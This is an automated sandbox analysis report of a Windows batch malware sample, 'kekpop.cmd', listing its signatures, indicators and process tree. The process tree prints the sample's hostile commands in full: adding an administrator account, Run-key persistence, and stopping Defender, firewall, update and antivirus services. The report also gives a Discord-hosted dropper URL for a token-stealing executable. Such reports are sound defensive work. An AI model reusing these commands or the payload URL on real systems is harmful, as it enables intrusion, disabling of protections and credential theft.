4539abba5b497555fd5b7ab3275ea1894e698f826e8af2eb2cca83acdbcd88e2

Analysis

max time kernel
144s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
13/05/2022, 16:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

kekpop.cmd
Size

47KB
MD5

f190183b6a6f55daa406c25cf5da66d8
SHA1

89168542e0cec21bbafeafe39361994194576f61
SHA256

ea81248fddbf9080018845bf7862b9ceb8ab942526c1adcf20030f043c57ad99
SHA512

e28483273e68945b12baf8319ddafc58a65e82883c79fec47add970429f7b8ac02d91b7f68612058c0530ae6bfd66af959a0f6222e09acc81e816ca34c3ec448

Score

10^/10

evasion persistence spyware stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 3 IoCs

flow	pid	Process
20	3628	powershell.exe
21	1640	powershell.exe
85	3296	powershell.exe

Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
5744	GetToken.exe
5960	GetToken.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 9 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_30268_toolbar = "C:\\Users\\Admin\\AppData\\Local\\Temp\\kekpop.cmd"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVAADA = "C:\\Windows\\.bat"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_30333_toolbar = "keklog.cmd"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVAADA = "C:\\Windows\\.bat"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\scoped_dir4764_687727289\CRX_INSTALL\_locales\bg	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_976887958\CRX_INSTALL\_locales\en_GB	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_1482084170\CRX_INSTALL\_locales\it	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_166479677\CRX_INSTALL\_locales\no	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_166479677\CRX_INSTALL\_locales\zh_HK	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_267319405\CRX_INSTALL\_locales\nl	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_634586841\CRX_INSTALL\_locales\sw	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_687727289\CRX_INSTALL\_locales\es	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_687727289\CRX_INSTALL\_locales\nb	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_1630763119\CRX_INSTALL\_locales\sk	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_166479677\CRX_INSTALL\_locales\sk	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_166479677\CRX_INSTALL\_locales\tr	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_1630763119\CRX_INSTALL\_locales\pl	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_166479677\CRX_INSTALL\_locales\sw	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_1843529347\CRX_INSTALL\_locales\sr	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_267319405\CRX_INSTALL\_locales\de	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_687727289\CRX_INSTALL\_locales\uk	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_1482084170	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_1482084170\CRX_INSTALL\_locales\el	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_1482084170\CRX_INSTALL\_locales\fr	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_976887958\CRX_INSTALL\_locales\et	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_976887958\CRX_INSTALL\_locales\zh_CN	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_687727289\CRX_INSTALL\html	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_687727289\CRX_INSTALL\_locales\es_419	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_687727289\CRX_INSTALL\_locales\lt	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_976887958\CRX_INSTALL\_locales\cs	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_1487501253\CRX_INSTALL	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_166479677\CRX_INSTALL\_locales\my	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_687727289\CRX_INSTALL\css	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_1630763119\CRX_INSTALL\_locales\he	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_687727289\CRX_INSTALL\_locales\sv	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_634586841\CRX_INSTALL\_locales\kn	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_1630763119\CRX_INSTALL\_locales\da	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_267319405\CRX_INSTALL\_locales\fil	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_634586841\CRX_INSTALL\_locales\et	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_687727289\CRX_INSTALL\_locales\el	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_687727289\CRX_INSTALL\_locales\nl	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_976887958\CRX_INSTALL\_locales\uk	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_1630763119\CRX_INSTALL\_locales\fi	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_166479677\CRX_INSTALL\_locales\ko	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_634586841\CRX_INSTALL\_locales\ca	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_634586841\CRX_INSTALL\_locales\id	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_687727289\CRX_INSTALL\_locales\pt_BR	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_976887958\CRX_INSTALL\_locales\zh_TW	xcopy.exe
File opened for modification	C:\Windows\system32\3132824866	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_1482084170\CRX_INSTALL\_locales\tr	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_267319405\CRX_INSTALL\_locales\pt_PT	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_166479677\CRX_INSTALL\_locales\km	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_166479677\CRX_INSTALL\_locales\lv	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_166479677\CRX_INSTALL\_locales\sv	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_166479677\CRX_INSTALL\_locales\zh_CN	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_634586841\CRX_INSTALL\_locales\ko	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_1482084170\CRX_INSTALL\_locales\pt_PT	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_1630763119\CRX_INSTALL\_locales\en	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_166479677\CRX_INSTALL\_locales\az	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_634586841\CRX_INSTALL\_locales\uk	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_687727289\CRX_INSTALL\images	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_976887958\CRX_INSTALL\_locales\en_US	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_1843529347\CRX_INSTALL\_locales\ms	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_634586841\CRX_INSTALL\_locales\ru	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_687727289\CRX_INSTALL\_locales\en_GB	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_976887958\CRX_INSTALL\_locales\fi	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_1482084170\CRX_INSTALL\_locales\sk	xcopy.exe
File opened for modification	C:\Windows\system32\scoped_dir4764_1630763119\CRX_INSTALL\_locales\ro	xcopy.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\29a1bca1-0bf4-44c2-9a9d-400702e1814c.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220513185014.pma	setup.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32	xcopy.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
5516	ipconfig.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5872	systeminfo.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
1672	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
4172	reg.exe
2708	reg.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\%qBRee:~23	cmd.exe
File opened for modification	C:\Users\Admin\Desktop\%maxMg:~25	cmd.exe

Runs net.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
5880	PING.EXE
2104	PING.EXE

Suspicious behavior: EnumeratesProcesses 63 IoCs

pid	Process
3164	powershell.exe
3164	powershell.exe
3164	powershell.exe
3668	tskill.exe
3668	tskill.exe
4996	tskill.exe
4996	tskill.exe
3448	tskill.exe
3448	tskill.exe
4812	tskill.exe
4812	tskill.exe
4664	tskill.exe
4664	tskill.exe
4652	tskill.exe
4652	tskill.exe
1092	tskill.exe
1092	tskill.exe
4068	tskill.exe
4068	tskill.exe
4364	tskill.exe
4364	tskill.exe
4372	tskill.exe
4372	tskill.exe
3628	powershell.exe
3628	powershell.exe
3628	powershell.exe
1640	powershell.exe
1640	powershell.exe
1640	powershell.exe
1696	msedge.exe
1696	msedge.exe
5192	powershell.exe
5192	powershell.exe
5192	powershell.exe
2768	msedge.exe
2768	msedge.exe
5644	identity_helper.exe
5644	identity_helper.exe
3296	powershell.exe
3296	powershell.exe
3296	powershell.exe
5764	powershell.exe
5764	powershell.exe
5764	powershell.exe
6288	powershell.exe
6288	powershell.exe
6288	powershell.exe
6396	powershell.exe
6396	powershell.exe
6396	powershell.exe
6508	powershell.exe
6508	powershell.exe
6508	powershell.exe
6616	powershell.exe
6616	powershell.exe
6616	powershell.exe
6720	powershell.exe
6720	powershell.exe
6720	powershell.exe
1660	msedge.exe
1660	msedge.exe
3932	msedge.exe
3932	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
2768	msedge.exe
2768	msedge.exe
2768	msedge.exe
2768	msedge.exe
3932	msedge.exe
3932	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3164	powershell.exe
Token: SeDebugPrivilege	1672	taskkill.exe
Token: SeDebugPrivilege	3628	powershell.exe
Token: SeDebugPrivilege	1640	powershell.exe
Token: SeDebugPrivilege	5192	powershell.exe
Token: SeIncreaseQuotaPrivilege	5712	WMIC.exe
Token: SeSecurityPrivilege	5712	WMIC.exe
Token: SeTakeOwnershipPrivilege	5712	WMIC.exe
Token: SeLoadDriverPrivilege	5712	WMIC.exe
Token: SeSystemProfilePrivilege	5712	WMIC.exe
Token: SeSystemtimePrivilege	5712	WMIC.exe
Token: SeProfSingleProcessPrivilege	5712	WMIC.exe
Token: SeIncBasePriorityPrivilege	5712	WMIC.exe
Token: SeCreatePagefilePrivilege	5712	WMIC.exe
Token: SeBackupPrivilege	5712	WMIC.exe
Token: SeRestorePrivilege	5712	WMIC.exe
Token: SeShutdownPrivilege	5712	WMIC.exe
Token: SeDebugPrivilege	5712	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5712	WMIC.exe
Token: SeRemoteShutdownPrivilege	5712	WMIC.exe
Token: SeUndockPrivilege	5712	WMIC.exe
Token: SeManageVolumePrivilege	5712	WMIC.exe
Token: 33	5712	WMIC.exe
Token: 34	5712	WMIC.exe
Token: 35	5712	WMIC.exe
Token: 36	5712	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5712	WMIC.exe
Token: SeSecurityPrivilege	5712	WMIC.exe
Token: SeTakeOwnershipPrivilege	5712	WMIC.exe
Token: SeLoadDriverPrivilege	5712	WMIC.exe
Token: SeSystemProfilePrivilege	5712	WMIC.exe
Token: SeSystemtimePrivilege	5712	WMIC.exe
Token: SeProfSingleProcessPrivilege	5712	WMIC.exe
Token: SeIncBasePriorityPrivilege	5712	WMIC.exe
Token: SeCreatePagefilePrivilege	5712	WMIC.exe
Token: SeBackupPrivilege	5712	WMIC.exe
Token: SeRestorePrivilege	5712	WMIC.exe
Token: SeShutdownPrivilege	5712	WMIC.exe
Token: SeDebugPrivilege	5712	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5712	WMIC.exe
Token: SeRemoteShutdownPrivilege	5712	WMIC.exe
Token: SeUndockPrivilege	5712	WMIC.exe
Token: SeManageVolumePrivilege	5712	WMIC.exe
Token: 33	5712	WMIC.exe
Token: 34	5712	WMIC.exe
Token: 35	5712	WMIC.exe
Token: 36	5712	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5748	WMIC.exe
Token: SeSecurityPrivilege	5748	WMIC.exe
Token: SeTakeOwnershipPrivilege	5748	WMIC.exe
Token: SeLoadDriverPrivilege	5748	WMIC.exe
Token: SeSystemProfilePrivilege	5748	WMIC.exe
Token: SeSystemtimePrivilege	5748	WMIC.exe
Token: SeProfSingleProcessPrivilege	5748	WMIC.exe
Token: SeIncBasePriorityPrivilege	5748	WMIC.exe
Token: SeCreatePagefilePrivilege	5748	WMIC.exe
Token: SeBackupPrivilege	5748	WMIC.exe
Token: SeRestorePrivilege	5748	WMIC.exe
Token: SeShutdownPrivilege	5748	WMIC.exe
Token: SeDebugPrivilege	5748	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5748	WMIC.exe
Token: SeRemoteShutdownPrivilege	5748	WMIC.exe
Token: SeUndockPrivilege	5748	WMIC.exe
Token: SeManageVolumePrivilege	5748	WMIC.exe

Suspicious use of FindShellTrayWindow 37 IoCs

pid	Process
2768	msedge.exe
2768	msedge.exe
2768	msedge.exe
2768	msedge.exe
2768	msedge.exe
2768	msedge.exe
2768	msedge.exe
2768	msedge.exe
2768	msedge.exe
2768	msedge.exe
2768	msedge.exe
2768	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
2768	msedge.exe
2768	msedge.exe
2768	msedge.exe
2768	msedge.exe
2768	msedge.exe
2768	msedge.exe
2768	msedge.exe
2768	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe
3932	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4524 wrote to memory of 4152	4524	cmd.exe	83
PID 4524 wrote to memory of 4152	4524	cmd.exe	83
PID 4524 wrote to memory of 3164	4524	cmd.exe	84
PID 4524 wrote to memory of 3164	4524	cmd.exe	84
PID 4524 wrote to memory of 4276	4524	cmd.exe	85
PID 4524 wrote to memory of 4276	4524	cmd.exe	85
PID 4276 wrote to memory of 4400	4276	net.exe	86
PID 4276 wrote to memory of 4400	4276	net.exe	86
PID 4524 wrote to memory of 4208	4524	cmd.exe	87
PID 4524 wrote to memory of 4208	4524	cmd.exe	87
PID 4524 wrote to memory of 4172	4524	cmd.exe	88
PID 4524 wrote to memory of 4172	4524	cmd.exe	88
PID 4524 wrote to memory of 4132	4524	cmd.exe	89
PID 4524 wrote to memory of 4132	4524	cmd.exe	89
PID 4524 wrote to memory of 2252	4524	cmd.exe	91
PID 4524 wrote to memory of 2252	4524	cmd.exe	91
PID 4524 wrote to memory of 3184	4524	cmd.exe	92
PID 4524 wrote to memory of 3184	4524	cmd.exe	92
PID 4524 wrote to memory of 2076	4524	cmd.exe	93
PID 4524 wrote to memory of 2076	4524	cmd.exe	93
PID 2076 wrote to memory of 4708	2076	net.exe	95
PID 2076 wrote to memory of 4708	2076	net.exe	95
PID 3184 wrote to memory of 824	3184	cmd.exe	96
PID 3184 wrote to memory of 824	3184	cmd.exe	96
PID 4524 wrote to memory of 1672	4524	cmd.exe	97
PID 4524 wrote to memory of 1672	4524	cmd.exe	97
PID 4524 wrote to memory of 3700	4524	cmd.exe	98
PID 4524 wrote to memory of 3700	4524	cmd.exe	98
PID 3700 wrote to memory of 4072	3700	net.exe	99
PID 3700 wrote to memory of 4072	3700	net.exe	99
PID 4524 wrote to memory of 3076	4524	cmd.exe	100
PID 4524 wrote to memory of 3076	4524	cmd.exe	100
PID 3076 wrote to memory of 4148	3076	net.exe	101
PID 3076 wrote to memory of 4148	3076	net.exe	101
PID 4524 wrote to memory of 2764	4524	cmd.exe	102
PID 4524 wrote to memory of 2764	4524	cmd.exe	102
PID 2764 wrote to memory of 3976	2764	net.exe	103
PID 2764 wrote to memory of 3976	2764	net.exe	103
PID 4524 wrote to memory of 768	4524	cmd.exe	104
PID 4524 wrote to memory of 768	4524	cmd.exe	104
PID 4524 wrote to memory of 32	4524	cmd.exe	105
PID 4524 wrote to memory of 32	4524	cmd.exe	105
PID 4524 wrote to memory of 4124	4524	cmd.exe	107
PID 4524 wrote to memory of 4124	4524	cmd.exe	107
PID 4524 wrote to memory of 2292	4524	cmd.exe	109
PID 4524 wrote to memory of 2292	4524	cmd.exe	109
PID 4524 wrote to memory of 2260	4524	cmd.exe	111
PID 4524 wrote to memory of 2260	4524	cmd.exe	111
PID 4524 wrote to memory of 3388	4524	cmd.exe	112
PID 4524 wrote to memory of 3388	4524	cmd.exe	112
PID 4524 wrote to memory of 560	4524	cmd.exe	114
PID 4524 wrote to memory of 560	4524	cmd.exe	114
PID 4524 wrote to memory of 3752	4524	cmd.exe	117
PID 4524 wrote to memory of 3752	4524	cmd.exe	117
PID 4524 wrote to memory of 4492	4524	cmd.exe	119
PID 4524 wrote to memory of 4492	4524	cmd.exe	119
PID 4524 wrote to memory of 3956	4524	cmd.exe	120
PID 4524 wrote to memory of 3956	4524	cmd.exe	120
PID 3184 wrote to memory of 64	3184	cmd.exe	126
PID 3184 wrote to memory of 64	3184	cmd.exe	126
PID 4524 wrote to memory of 448	4524	cmd.exe	124
PID 4524 wrote to memory of 448	4524	cmd.exe	124
PID 4524 wrote to memory of 4916	4524	cmd.exe	122
PID 4524 wrote to memory of 4916	4524	cmd.exe	122

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
4152	attrib.exe
4144	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\kekpop.cmd"
1⤵
- NTFS ADS
- Suspicious use of WriteProcessMemory
PID:4524
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Local\Temp\kekpop.cmd
  2⤵
  - Views/modifies file attributes
  PID:4152
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "Set-ExecutionPolicy Unrestricted"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3164
- C:\Windows\system32\net.exe
  net localgroup administrators session /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4276
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup administrators session /ADD
    3⤵
    PID:4400
- C:\Windows\system32\reg.exe
  reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_30268_toolbar" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\kekpop.cmd /f
  2⤵
  - Adds Run key to start application
  PID:4208
- C:\Windows\system32\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\.bat /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:4172
- C:\Windows\system32\reg.exe
  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
  2⤵
  PID:4132
- C:\Windows\system32\rundll32.exe
  RUNDLL32 USER32.DLL SwapMouseButton
  2⤵
  PID:2252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K black.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3184
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:824
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:64
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4996
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:944
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1888
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4872
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4216
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2788
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3080
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4968
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3336
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:524
- C:\Windows\system32\net.exe
  net stop "WinDefend"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2076
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "WinDefend"
    3⤵
    PID:4708
- C:\Windows\system32\taskkill.exe
  taskkill /f /t /im "MSASCui.exe"
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1672
- C:\Windows\system32\net.exe
  net stop "wuauserv"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3700
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "wuauserv"
    3⤵
    PID:4072
- C:\Windows\system32\net.exe
  net stop "security center"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3076
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "security center"
    3⤵
    PID:4148
- C:\Windows\system32\net.exe
  net stop sharedaccess
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2764
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sharedaccess
    3⤵
    PID:3976
- C:\Windows\system32\netsh.exe
  netsh firewall set opmode mode-disable
  2⤵
  PID:768
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:32
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:4124
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2292
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2260
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:3388
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:560
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:3752
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:4492
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:3956
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:4916
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:448
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:3444
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2908
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:3384
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:3432
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:4920
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:5080
- C:\Windows\system32\net.exe
  net stop "Security Center" /y
  2⤵
  PID:1340
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Security Center" /y
    3⤵
    PID:4008
- C:\Windows\system32\net.exe
  net stop "Automatic Updates" /y
  2⤵
  PID:4360
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Automatic Updates" /y
    3⤵
    PID:4196
- C:\Windows\system32\net.exe
  net stop "Symantec Core LC" /y
  2⤵
  PID:4508
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Symantec Core LC" /y
    3⤵
    PID:4668
- C:\Windows\system32\net.exe
  net stop "SAVScan" /y
  2⤵
  PID:4036
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SAVScan" /y
    3⤵
    PID:3836
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Firewall Monitor Service" /y
  2⤵
  PID:2148
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Firewall Monitor Service" /y
    3⤵
    PID:4184
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Auto-Protect Service" /y
  2⤵
  PID:2044
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Auto-Protect Service" /y
    3⤵
    PID:552
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Auto Protect Service" /y
  2⤵
  PID:4516
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
    3⤵
    PID:4904
